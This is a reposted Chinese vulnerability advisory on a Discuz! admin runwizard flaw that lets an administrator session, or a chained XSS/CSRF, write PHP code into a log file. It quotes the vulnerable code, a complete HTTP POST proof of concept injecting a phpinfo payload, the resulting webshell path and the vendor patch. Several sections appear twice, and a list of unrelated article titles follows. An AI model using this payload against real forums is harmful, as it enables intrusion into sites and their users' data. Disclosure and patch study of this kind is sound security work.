Discuz! admin unwizard.inc.php 漏洞利用(Get Webshell)
来源:互联网 发布:python 金字塔 编辑:程序博客网 时间:2024/06/13 12:50
由于Discuz!的admin unwizard.inc.php里saverunwizardhistory()写文件操作没有限制导致执行代码漏洞.
一、分析
在文件admin unwizard.inc.php里代码:
上面代码可以看出来当有后台权限时,可以直接得到webshell.如果结合xss[如:SODB-2008-01,SODB-2008-02..等] crsf[如:SODB-2008-03]等漏洞,可以直接通过admin身份远程写入webshell执行代码.
二、利用
poc:
webshell:
http://www.80vul.com/bbs/forumdata/logs/runwizardlog.php
三、补丁
今天发布的dz7 bt版本[1]已经fix这个漏洞了:
补丁下载地址:http://download.comsenz.com/Discuz/7.0.0Beta/Discuz_7_Beta_SC_GBK.zip
一、分析
在文件admin unwizard.inc.php里代码:
$runwizardhistory = array();
$runwizardfile = DISCUZ_ROOT.'./forumdata/logs/runwizardlog.php';
if($fp = @fopen($runwizardfile, 'r')) {
$runwizardhistory = @unserialize(fread($fp, 99999));
fclose($fp);
}
.......
if(submitcheck('step1submit')) {
$runwizardhistory['step1']['size'] = $size;
$runwizardhistory['step1']['safe'] = $safe;
$runwizardhistory['step1']['func'] = $func;
saverunwizardhistory();
}
........
function saverunwizardhistory() {
global $runwizardfile, $runwizardhistory;
$fp = fopen($runwizardfile, 'w');
fwrite($fp, serialize($runwizardhistory));
fclose($fp);
}
$runwizardfile = DISCUZ_ROOT.'./forumdata/logs/runwizardlog.php';
if($fp = @fopen($runwizardfile, 'r')) {
$runwizardhistory = @unserialize(fread($fp, 99999));
fclose($fp);
}
.......
if(submitcheck('step1submit')) {
$runwizardhistory['step1']['size'] = $size;
$runwizardhistory['step1']['safe'] = $safe;
$runwizardhistory['step1']['func'] = $func;
saverunwizardhistory();
}
........
function saverunwizardhistory() {
global $runwizardfile, $runwizardhistory;
$fp = fopen($runwizardfile, 'w');
fwrite($fp, serialize($runwizardhistory));
fclose($fp);
}
上面代码可以看出来当有后台权限时,可以直接得到webshell.如果结合xss[如:SODB-2008-01,SODB-2008-02..等] crsf[如:SODB-2008-03]等漏洞,可以直接通过admin身份远程写入webshell执行代码.
二、利用
poc:
POST /bbs/admincp.php?action=runwizard&step=3 HTTP/1.1
Host: www.80vul.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.80vul.com/bbs/admincp.php?action=runwizard&step=2
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
formhash=a1ae055f&anchor=&settingsnew%5Bbbname%5D=%3C%3Fphpinfo%28%29%3B%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%CF%C2%D2%BB%B2%BD
Host: www.80vul.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.80vul.com/bbs/admincp.php?action=runwizard&step=2
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
formhash=a1ae055f&anchor=&settingsnew%5Bbbname%5D=%3C%3Fphpinfo%28%29%3B%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%CF%C2%D2%BB%B2%BD
webshell:
http://www.80vul.com/bbs/forumdata/logs/runwizardlog.php
三、补丁
今天发布的dz7 bt版本[1]已经fix这个漏洞了:
function saverunwizardhistory() {
global $runwizardfile, $runwizardhistory;
$fp = fopen($runwizardfile, 'w');
$s = '<?php exit;?>';
$s .= serialize($runwizardhistory);
fwrite($fp, $s);
fclose($fp);
}
global $runwizardfile, $runwizardhistory;
$fp = fopen($runwizardfile, 'w');
$s = '<?php exit;?>';
$s .= serialize($runwizardhistory);
fwrite($fp, $s);
fclose($fp);
}
补丁下载地址:http://download.comsenz.com/Discuz/7.0.0Beta/Discuz_7_Beta_SC_GBK.zip
- Discuz! admin unwizard.inc.php 漏洞利用(Get Webshell)
- Discuz x3.1 utility/convert/config.inc.php漏洞get shell
- Discuz common.inc.php 部分解释-不断更新
- Discuz security.inc.php 代码解释
- Discuz!7.2 common.inc.php 学习
- 利用ASP上传漏洞得到webshell实战
- 利用ASP上传漏洞得到webshell实战
- 利用JBoss漏洞拿webshell方法
- discuz最新漏洞利用程序
- dedecms上传漏洞uploadsafe.inc.php 整理
- 利用动网论坛dvBBS漏洞上传webshell
- fckeditor php 漏洞利用
- 挖洞经验 | 把PHP LFI漏洞变成Webshell的思路
- Discuz 7.2 faq.php漏洞分析
- Discuz 漏洞
- PHP webshell
- php+apache fckeditor漏洞利用
- PHP文件包含漏洞利用
- Ebay易趣发展简史
- 通过代码方式修改IIS主机头
- 阿里巴巴发展史
- 二进制计算
- 淘宝发展简史
- Discuz! admin unwizard.inc.php 漏洞利用(Get Webshell)
- 腾讯面试题
- SoftICE使用(一)
- 操纵自如--页面内的配合与通信(接口实现确实比较创意)
- ps里jpg格式的图怎么保存成透明的
- 查看showModelDialog弹出窗口的源码
- (下载)WinCE注册表编辑器(PC端)
- 编程中国 - MySQL中文参考手册--获得数据库和表的信
- I have a new life